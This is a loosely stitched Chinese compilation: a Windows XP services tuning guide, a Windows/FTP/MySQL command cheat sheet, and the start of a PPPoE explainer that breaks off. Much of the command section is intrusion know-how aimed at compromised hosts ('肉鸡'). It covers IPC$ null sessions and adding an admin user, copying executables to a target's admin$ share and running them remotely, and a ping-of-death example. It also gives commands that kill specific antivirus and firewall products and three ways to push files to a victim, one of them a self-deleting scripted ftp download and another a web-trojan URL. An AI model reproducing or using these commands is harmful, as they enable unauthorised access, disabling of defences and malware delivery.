DSDM) 微软： 讯息动态数据交换 (DDE) 网络共享。如果这个服务被停止，DDE 网络共享将无法使用。如果这个服务被停用，任何明确依存于它的服务将无法启动。 补充： 一般人好像用不到 依存： Network DDE 建议： 已停用 Network Location Awareness (NLA) 微软： 收集并存放网络设定和位置信息，并且在这个信息变更时通知应用程序。 补充： 如果不使用 ICF 和 ICS 可以关了它 依存： AFD网络支持环境、TCP/IP Procotol Driver、Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS) 建议： 已停用 NT LM Security Support Provider (NTLM 安全性支持提供者) 微软： 为没有使用命名管道传输的远程过程调用 (RPC) 程序提供安全性。 补充： 如果不使用 Message Queuing 或是 Telnet Server 那就关了它 依存： Telnet 建议： 已停用 Performance Logs and Alerts (效能记录文件及警示) 微软： 基于事先设定的排程参数，从本机或远程计算机收集效能数据，然后将数据写入记录或?#124;发警讯。如果这个服务被停止，将不会收集效能信息。如果这个服务被停用，任何明确依存于它的服务将无法启动。 补充： 没什么价值的服务 建议： 已停用 Plug and Play (随插随用) 微软： 启用计算机以使用者没有或很少的输入来识别及适应硬件变更，停止或停用这个服务将导致系统不稳定。 补充： 顾名思义就是 PNP 环境 依存： Logical Disk Manager、Logical Disk Manager Administrative Service、Messenger、Smart Card、Telephony、Windows Audio 建议： 自动 Portable Media Serial Number 微软： Retrieves the serial number of any portable music player connected to your computer 补充： 透过联机计算机重新取得任何音乐拨放序号？没什么价值的服务 建议： 已停用 Print Spooler (打印多任务缓冲处理器) 微软： 将档案加载内存中以待稍后打印。 补充： 如果没有打印机，可以关了 依存： Remote Procedure Call (RPC) 建议： 已停用 Protected Storage (受保护的存放装置) 微软： 提供受保护的存放区，来储存私密金钥这类敏感数据，防止未授权的服务、处理、或使用者进行存取。 补充： 用来储存你计算机上密码的服务，像 Outlook、拨号程序、其它应用程序、主从架构等等 依存： Remote Procedure Call (RPC) 建议： 自动 QoS RSVP (QoS 许可控制，RSVP) 微软： 提供网络讯号及区域流量控制安装功能给可识别 QoS 的程序和控制小程序项。 补充： 用来保留 20% 频宽的服务，如果你的网络卡不支持 802.1p 或在你计算机的网域上没有 ACS server ，那么不用多说，关了它 依存： AFD网络支持环境、TCP/IP Procotol Driver、Remote Procedure Call (RPC) 建议： 已停用 Remote Access Auto Connection Manager (远程访问自动联机管理员) 微软： 当程序参照到远程 DNS 或 NetBIOS 名称或地址时，建立远程网络的联机。 补充： 有些 DSL/Cable 提供者，可能需要用此来处理登入程序 依存： Remote Access Connection Manager、Telephony 建议： 手动 Remote Access Connection Manager (远程访问联机管理员) 微软： 建立网络联机。 补充： 网络联机用 依存： Telephony、Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)、Remote Access Auto Connection Manager 建议： 手动 Remote Desktop Help Session Manager 微软： 管理并控制远程协助。如果此服务停止的话，远程协助将无法使用。停止此服务之前，请先参阅内容对话框中的 [依存性]标签。 补充： 如上说的管理和控制远程协助，如果不使用可以关了 依存： Remote Procedure Call (RPC) 建议： Disable Remote Procedure Call (RPC) (远程过程调用，RPC) 微软： 提供结束点对应程序以及其它 RPC 服务。 补充： 一些装置都依存它，别去动它 依存： 太多了，自己去看看 建议： 自动 Remote Procedure Call (RPC) Locator (远程过程调用定位程序) 微软： 管理 RPC 名称服务数据库。 补充： 如上说的，一般计算机上很少用到，可以尝试关了 依存： Workstation 建议： Disable Remote Registry (远程登录服务) 微软： 启用远程使用者修改这个计算机上的登录设定。如果这个服务被停止，登录只能由这个计算机上的使用者修改。如果这个服务被停用，任何明确依存于它的服务将无法启动。 补充： 基于安全性的理由，如果没有特别的需求，建议最好关了它，除非你需要远程协助修改你的登录设定 依存： Remote Procedure Call (RPC) 建议： 已停用 Removable Storage (卸除式存放装置) 微软： None 补充： 除非你有 Zip 磁盘驱动器或是 USB 之类可携式的硬件或是 Tape 备份装置，不然可以尝试关了 依存： Remote Procedure Call (RPC) 建议： Disable Routing and Remote Access (路由和远程访问) 微软： 提供连到局域网络及广域网络的公司的路由服务。 补充： 如上说的，提供拨号联机到区网或是 VPN 服务，一般用户用不到 依存： Remote Procedure Call (RPC)、NetBIOSGroup 建议： 已停用 Secondary Logon 微软： 启用在其它认证下的起始程序。如果这个服务被停止，这类的登入存取将无法使用。如果这个服务被停用，任何明确依存于它的服务将无法启动。 补充： 允许多个使用者处理程序，执行分身等 建议： 自动 Security Accounts Manager (安全性账户管理员) 微软： 储存本机账户的安全性信息。 补充： 管理账号和群组原则(gpedit.msc)应用 依存： Remote Procedure Call (RPC)、Distributed Transaction Coordinator 建议： 自动 Server (服务器) 微软： 透过网络为这台计算机提供档案、打印、及命名管道的共享。如果停止这个服务，将无法使用这些功能。如果停用这个服务，所有依存于它的服务将无法启动。 补充： 简单的说就是档案和打印的分享，除非你有和其它计算机分享，不然就关了 依存： Computer Browser 建议： 已停用 Shell Hardware Detection 微软： 为自动播放硬件事件提供通知。 补充： 一般使用在记忆卡或是CD装置、DVD装置上 依存： Remote Procedure Call (RPC) 建议： 自动 Smart Card (智慧卡) 微软： 管理这个计算机所读取智能卡的存取。如果这个服务被停止，这个计算机将无法读取智能卡。如果这个服务被停用，任何明确依存于它的服务将无法启动。 补充： 如果你不使用 Smart Card ，那就可以关了 依存： Plug and Play 建议： 已停用 Smart Card Helper (智能卡协助程序) 微软： 启用对这个计算机使用的旧版非随插即用智能卡读取头的支持。如果这个服务被停止，这个计算机将不支持旧版读取头。如果这个服务被停用，任何明确依存于它的服务将无法启动。 补充： 如果你不使用 Smart Card ，那就可以关了 建议： 已停用 SSDP Discovery Service 微软： 在您的家用网络上启用通用随插即用装置的搜索。 补充： 如上说的，通用随插即用服务 (Universal Plug and Play, UPnP) 让计算机可以找到并使用网络上的装置，经由网络联机透过 TCP/IP 来搜索装置，像网络上的扫瞄器、数字相机或是打印机，亦即使用 UPnP 的功能，基于安全性没用到的大可关了 依存： Universal Plug and Play Device Host 建议： 已停用 System Event Notification (系统事件通知) 微软： 追踪诸如 Windows 登入、网络、和电源事件的系统事件。通知这些事件的 COM+ 事件系统订阅者。 补充： 如上所说的 依存： COM+ Event System 建议： 自动 System Restore Service 微软： 执行系统还原功能。若要停止服务，从我的计算机->内容，[系统还原] 中关闭系统还原 补充： 将计算机回复至先前的状态，不使用就关了 依存： Remote Procedure Call (RPC) 建议： 已停用 Task Scheduler (工作排程器) 微软： 让使用者能够在这个计算机上设定和排定自动的工作。如果停止这个服务，这些工作在它们排定的时间时将不会执行。如果停用这个服务，任何明确依存于它的服务将无法启动。 补充： 设定排定自动的工作，像一些定时磁盘扫瞄、病毒定时扫瞄、更新等等 依存： Remote Procedure Call (RPC) 建议： 自动 TCP/IP NetBIOS Helper (TCP/IP NetBIOS 协助程序) 微软： 启用 [NetBIOS over TCP/IP (NetBT)] 服务及 NetBIOS 名称解析的支持。 补充： 如果你的网络不使用 NetBios 或是 WINS ，你大可关闭 依存： AFD 网络支持环境、NetBt 建议： 已停用 Telephony (电话语音) 微软： 为本机计算机上及经由局域网络连接到正在执行此服务的服务器上，控制电话语音装置和 IP 为主语音联机的程序，提供电话语音 API (TAPI) 支持。 补充： 一般的拨号调制解调器或是一些 DSL/Cable 可能用到 依存： Plug and Play、Remote Procedure Call (RPC)、Remote Access Connection Manager、Remote Access Auto Connection Manager 建议： 手动 Telnet 微软： 启用一个远程使用者来登入到这台计算机和执行应用程序，以及支持各种 TCP/IP Telnet 客户端，包含以 UNIX 为基本和以 Windows 为基本的计算机。如果服务停止了，远程使用者可能无法存取应用程序。如果服务停用了，任何明确地依存于这项服务的其它服务将会启动失败。 补充： 允许远程使用者用 Telnet 登入本计算机，一般人会误解关了就无法使用BBS，这其实和BBS无关，基于安全性的理由，如果没有特别的需求，建议最好关了 依存： NT LM Security Support Provider、Remote Procedure Call (RPC)、TCP/IP Protocol Driver 建议： 已停用 Terminal Services (终端机服务) 微软： 允许多位使用者互动连接到同一部计算机、桌面的显示器及到远程计算机的应用程序。远程桌面的加强 (包含系统管理员的 RD)、快速切换使用者、远程协助和终端机服务器。 补充： 远程桌面或是远程协助的功能，不需要就关了 依存： Remote Procedure Call (RPC)、Fast User Switching Compatibility、InteractiveLogon 建议： 已停用 Themes 微软： 提供使用者经验主题管理。 补充： 很多人使用布景主题，不过如果没有使用的人，那就可以关闭 建议： 自动 Uninterruptible Power Supply (不断电供电系统) 微软： 管理连接到这台计算机的不断电电源供应 (UPS)。 补充： 不断电电源供应 (UPS)一般人有用到吗？除非你的电源供应器有具备此功能，不然就关了 建议： 已停用 Universal Plug and Play Device Host 微软： 提供主机通用随插即用装置的支持。 补充： 用来侦测安装通用随插即用服务 (Universal Plug and Play, UPnP)装置，像是数字相机或打印机 依存： SSDP Discovery Service 建议： 已停用 Volume Shadow Copy 微软： 管理及执行用于备份和其它目的的磁盘区卷影复制。如果这个服务被停止，卷影复制将无法用于备份，备份可能会失败。如果这个服务被停用，任何明确依存于它的服务将无法启动。 补充： 如上所说的，用来备份的?#124;西，如 MS Backup 程序就需要这个服务 依存： Remote Procedure Call (RPC) 建议： 已停用 WebClient 微软： 启用 Windows 为主的程序来建立、存取，以及修改因特网为主的档案。如果停止这个服务，这些功能将无法使用。如果停用这个服务，任何明确依存于它的服务将无法启动。 补充： 使用 WebDAV 将档案或数据夹上载到所有的 Web 服务，基于安全性的理由，你可以尝试关闭 依存： WebDav Client Redirector 建议： 已停用 Windows Audio 微软： 管理用于 Windows 为主程序的音讯装置。如果这个服务被停止，音讯装置和效果将无法正常?#092;作。如果这个服务被停用，任何明确依存于它的服务将无法启动。 补充： 如果你没有声卡可以关了他 依存： Plug and Play、Remote Procedure Call (RPC) 建议： 自动 Windows Image Acquisition (WIA) (Windows影像取得程序) 微软： 为扫描仪和数字相机提供影像撷取服务。 补充： 如果扫描仪和数字相机内部具有支持WIA功能的话，那就可以直接看到图档，不需要其它的驱动程序，所以没有扫描仪和数字相机的使用者大可关了 依存： Remote Procedure Call (RPC) 建议： 已停用 Windows Installer (Windows 安装程序) 微软： 根据包含在 .MSI 档案内的指示来安装，修复以及移除软件。 补充： 是一个系统服务，协助使用者正确地安装、设定、追踪、升级和移除软件程序，可管理应用程序建立和安装的标准格式，并且追踪例如档案群组、登录项目及快捷方式等组件 依存： Remote Procedure Call (RPC) 建议： 手动 Windows Management Instrumentation (WMI) 微软： 提供公用接口及对象模型，以存取有关操作系统、装置、应用程序及服务的管理信息。如果这个服务已停止，大多数的 Windows 软件将无法正常?#092;作。如果这个服务已停用，所有依存于它的服务都将无法启动。 补充： 如上说的，是一种提供一个标准的基础结构来监视和管理系统资源的服务，由不得你动他 依存： Event Log、Remote Procedure Call (RPC) 建议： 自动 Windows Management Instrumentation Driver Extensions (Windows Management Instrumentation 驱动程序延伸) 微软： 提供系统管理信息给予/取自驱动程序。 补充： Windows Management Instrumentation 的延伸，提供信息用的 建议： 手动 Windows Time (Windows 时间设定) 微软： 维护在网络上所有客户端及服务器的数据及时间同步处理。如果这个服务停止，将无法进行日期及时间同步处理。如果这个服务被停用，所有依存的服务都会停止。 补充： 网络对时校准用的，没必要就关了 建议： 已停用 Wireless Zero Configuration 微软： 为 802.11 适配卡提供自动设定 补充： 自动配置无线网络装置，言下之意就是说，除非你有在使用无线网络适配卡装置，那么你才有必要使用这个网络零管理服务 依存： NDIS Usermode I/O Protocol、Remote Procedure Call (RPC) 建议： 已停用 WMI Performance Adapter 微软： 提供来自 WMIHiPerf 提供者的效能链接库信息。 补充： 如上所提 依存： Remote Procedure Call (RPC) 建议： 已停用l Workstation (工作站) 微软： 建立并维护到远程服务器的客户端网络联机。如果停止这个服务，这些联机将无法使用。如果停用这个服务，所有依存于它的服务将无法启动。 补充： 因特网联机中所必要的一些功能 依存： Alerter、Background Intelligent Transfer Service、Computer Browser、Messenger、Net Logon、Remote Procedure Call (RPC) Locator 建议： 自动 方法一： 用批处理命令进行处理：SC CONFIG 命令进行处理 描述: 在注册表和服务数据库中修改服务项。 用法: sc config [service name] … 选项: 注意: 选项名称包括等号。 type= start= error= binPath= group= tag= depend= <依存关系(以 / (斜杠) 分隔)> obj= DisplayName= <显示名称> password= <密码> 方法二： 在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]下查找可疑键值，并在[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\]下查看的可疑主键。 然后禁用或删除木马添加的服务项：在“运行”中输入“Services.msc”打开服务设置窗口，里面显示了系统中所有的服务项及其状态、启动类型和登录性质等信息。找到木马所启动的服务，双击打开它，把启动类型改为“已禁用”，确定后退出。也可以通过注册表进行修改，依次展开“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\服务显示名称”键，在右边窗格中找到二进制值“Start”，修改它的数值数，“2”表示自动，“3”表示手动，而“4”表示已禁用。当然最好直接删除整个主键，平时可以通过注册表导出功能，备份这些键值以便随时对照。

net use \\ip\ipc$ “ “ /user:” “ 建立IPC空链接 net use \\ip\ipc$ “密码” /user:”用户名” 建立IPC非空链接 net use h: \\ip\c$ “密码” /user:”用户名” 直接登陆后映射对方C：到本地为H: net use h: \\ip\c$ 登陆后映射对方C：到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名　密码　/add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名　 开启服务；(如:net start telnet， net start schedule) net stop 服务名 停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名 暂停某服务 net send ip “文本信息” 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C：共享 net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码 更改系统登陆密码 netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况，常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） netstat -s 查看正在使用的所有协议使用情况 nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。 ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息 tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

#2 二：

del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同） move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，”> “和”> >” 是重定向命令 at id号 开启已注册的某个计划任务 at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 at id号 /delete 停止某个已注册的计划任务 at 查看所有的计划任务 at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 finger username @host 查看最近有哪些用户登陆 telnet ip 端口 远和登陆服务器,默认端口为23 open ip 连接到IP（属telnet登陆后的命令） telnet 在本机上直接键入telnet 将进入本机的telnet copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下 cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件 tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送 tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时) route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令 mem 查看cpu使用情况 attrib 文件名(目录名) 查看某文件（目录）的属性 attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间 set 指定环境变量名称=要指派给变量的字符 设置环境变量 set 显示当前所有的环境变量 set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 pause 暂停批处理程序，并显示出：请按任意键继续…. if 在批处理程序中执行条件处理（更多说明见if命令及变量） goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签） call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?） for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置 echo 信息 在屏幕上显示出信息 echo 信息 >> pass.txt 将”信息”保存到pass.txt文件中 findstr “Hello” aa.txt 在aa.txt文件中寻找字符串hello find 文件名 查找某文件 title 标题名字 更改CMD窗口标题名字 color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ ) #3 三：

ver 在DOS窗口下显示版本信息 winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名） format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS md　目录名 创建目录 replace 源文件　要替换文件的目录 替换文件 ren 原文件名　新文件名 重命名文件名 tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称 type 文件名 显示文本文件的内容 more 文件名 逐屏显示输出文件 doskey 要锁定的命令＝字符 doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir= taskmgr 调出任务管理器 chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口 exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe path 路径\可执行文件的文件名 为可执行文件设置一个路径。 cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示； regedit /e 注册表文件名 导出注册表 cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 cacls 文件名 查看文件的访问用户权限列表 REM 文本内容 在批处理文件中添加注解 netsh 查看或更改本地网络配置情况

#4 四：

IIS服务命令： iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现） iisreset /start或stop 启动（停止）所有Internet服务 iisreset /restart 停止然后重新启动所有Internet服务 iisreset /status 显示所有Internet服务状态 iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动 iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务 iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。 FTP 命令： (后面有详细说明内容) ftp的命令行格式为: ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。 －d 使用调试方式。 －n 限制ftp的自动登录,即不使用.netrc文件。 －g 取消全局文件名。 help [命令] 或 ？[命令] 查看命令说明 bye 或 quit 终止主机FTP进程,并退出FTP管理方式. pwd 列出当前远端主机目录 put 或 send 本地文件名 get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 mget [remote-files] 从远端主机接收一批文件至本地主机 mput local-files 将本地主机中一批文件传送至远端主机 dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 ascii 设定以ASCII方式传送文件(缺省值) bin 或 image 设定以二进制方式传送文件 bell 每完成一次文件传送,报警提示 cdup 返回上一级目录 close 中断与远程服务器的ftp会话(与open对应) open host[port] 建立指定ftp服务器连接,可指定连接端口 delete 删除远端主机中的文件 mdelete [remote-files] 删除一批文件 mkdir directory-name 在远端主机中建立目录 rename [from] [to] 改变远端主机中的文件名 rmdir directory-name 删除远端主机中的目录 status 显示当前FTP的状态 system 显示远端主机系统类型 user user-name [password] [account] 重新以别的用户名登录远端主机 open host [port] 重新建立一个新的连接 prompt 交互提示模式 macdef 定义宏命令 lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 chmod 改变远端主机的文件权限 case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 cd remote－dir 进入远程主机目录 cdup 进入远程主机目录的父目录 ! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip

#5 五：

MYSQL 命令： mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。 （例：mysql -h110.110.110.110 -Uroot -P123456 注:u与root可以不用加空格，其它也一样） exit 退出MYSQL mysqladmin -u用户名 -p旧密码 password 新密码 修改密码 grant select on 数据库.* to 用户名@登录主机 identified by \“密码\“; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符） show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。 use mysql； show tables; 显示库中的数据表 describe 表名; 显示数据表的结构 create database 库名; 建库 use 库名； create table 表名 (字段设定列表)； 建表 drop database 库名; drop table 表名； 删库和删表 delete from 表名; 将表中记录清空 select * from 表名; 显示表中的记录 mysqldump –opt school>school.bbb 备份数据库：（命令在DOS的\\mysql\\bin目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 win2003系统下新增命令（实用部份）： shutdown /参数 关闭或重启本地或远程主机。 参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。 例：shutdown /r /t 0 立即重启本地主机（无延时） taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。 参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。 tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。 参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程。 一.对用户操作 net user 查看有哪些用户 net user guest /active:yes 激活guest用户 net user 用户名　密码　/add 建立用户 net localgroup administrators 用户名 /add 把“用户”添加到管理员中 使其具有管理员权限

net start —–查看开启了哪些服务 net start 服务名—–开启服务 net stop 服务名——停止某服务 netstat -an :查看端口的网络连接情况 ipconfig :查看本地ip地址

net stop sharedaccess —-关系统自带防火墙 pskill.exe ravmon —–杀掉瑞星软件 pskill.exe pfw —-关天网防火墙 net stop “Symantec AntiVirus”—-关于诺顿企业版 net stop KAVStart——关闭金山杀毒

向肉鸡上传文件命令: 第一种方法:tftp 命令格式:tftp -i 你的公网IP get xx.exe 第二种方法:ftp 命令格式: echo open xxx.xxx.xxx.xxx>c:\520hack.txt echo user>>c:\520hack.txt echo pass>>c:\520hack.txt echo get aoqi.rar>>c:\520hack.txt echo bye>>c:\520hack.txt ftp -s:c:\520hack.txt del c:\520hack.txt

第三种方法: start http://caihuoche.h126.com (改成你的网页木马地址)

         modem接入技术面临一些相互矛盾的目标，既要通过同一个用户前置接入设备连接远程的多个用户主机，又要提供类似拨号一样的接入控制，计费等功能，而且要尽可能地减少用户的配置操作。 PPPOE的目标就是解决上述问题，1998年后期问世的以太网上点对点协议（PPPoverEthernet）技术是由Redback网络公司、客户端软件开发商RouterWare公司以及Worldcom子公司UUNET　　　　　　Technologies公司在IETFRFC的基础上联合开发的。通过把最经济的局域网技术－以太网和点对点协议的可扩展性及管理控制功能结合在一起，网络服务提供商和电信运营商便可利用可靠和熟悉的技术来加速部署高速互联网业务。它使服务提供商在通过数字用户线、电缆调制解调器或无线连接等方式，提供支持多用户的宽带接入服务时更加简便易行。同时该技术亦简化了最终用户在选择这些服务时的配置操作。

PPPOE特点 PPPOE在标准PPP报文的前面加上以太网的报头，使得PPPOE提供通过简单桥接接入设备连接远端接入设备，并可以利用以太网的共享性连接多个用户主机，在这个模型下，每个用户主机利用自身的ppp堆栈，用户使用熟悉的界面。接入控制，计费等都可以针对每个用户来进行。 PPPOE的优点： .�安裝与操作方式类似于以往的拨号网络模式，方便用戶使用。 .�用户处的XDSL调制解调器无须任何配置。 .�允许多个用户共享一个高速数据接入链路。 .�适应小型企业和远程办公的要求。 .�终端用户可同时接入多个ISP，这种动态服务选择的功能可以使　ISP容易创建和提供新的业务。 .�兼容现有所有的XDSLModem和DSLAM。 .�可与ISP有接入结构相融合。

PPPOE的帧格式

参数取值ETHER_TYPE： 0x8863 Discovery Stage 0x8864 PPP Session Stage CODE： 0x00 PPP Session Stage 0x09 PPPOE Active Discovery Initiation (PADI) packet 0x07 PPPOE Active Discovery Offer (PADO) packet 0x19 PPPOE Active Discovery Request (PADR) packet 0x65 PPPOE Active Discovery Session-confirmation (PADS) packet 0xa7 PPPOE Active Discovery Terminate (PADT) packet TAG_TYPES： 0x0000 End-Of-List 0x0101 Service-Name 0x0102 AC-Name 0x0103 Host-Uniq 0x0104 AC-Cookie 0x0105 Vendor-Specific 0x0110 Relay-Session-Id 0x0201 Service-Name-Error 0x0202 AC-System-Error 0x0203 Generic-Error PPPOE的实现过程 建立一个以太网上点对点协议会话包括两个阶段：1. 发现（Discovery）阶段

在Discovery过程中用户主机以广播方式寻找可以连接的所有接入设备，获得其以太网MAC地址。然后选择需要连接的用户主机并最后获得所要建立的PPP会话的SESSION_ID。在Discovery过程中节点间是客户端－服务器关系， 一个用户主机（客户端）最终要发现一个接入设备（服务器）。在网络拓朴中，一般有不止一个的接入设备可以通信，Discovery阶段允许用户主机发现所有的接入设备，并从中选择一个。当Discovery阶段结束时， 用户主机和接入设备之间都获得了可供以太网上建立PPP连接的全部信息。Discovery阶段保持无连接状态直到一个PPP会话的建立。一旦PPP连接建立，则用户主机和接入设备都必须为PPP虚拟端口分配资源。 PPP 会话阶段 用户主机与在发现阶段确定的接入设备进行PPP协商。这个协商过程与标准的PPP协商并没有任何区别。在PPP会话阶段节点间是对等关系。 发现（Discovery）阶段详述 典型的发现（Discovery）阶段共包括4个步骤： 1. 用户主机发出PPPOE有效发现初始（PADI）包。以太网目的地址为广播地址0xffffffff， CODE 字段为0x09， SESSION_ID为0x0000。PADI包必须至少包含一个服务名称类型（Service-Name）的标签（标签类型字段为0x0101）， 向接入设备提出所要求提供的服务。一个完整的PADI（包括PPPOE头）不能超过1484字节，以留下充足的预留给agent设备增加Relay-Session-Id标识。 2. 接入设备收到在服务范围内的PADI包后，发送PPPOE有效发现提供（PADO） 包以响应请求。其CODE字段为0x07 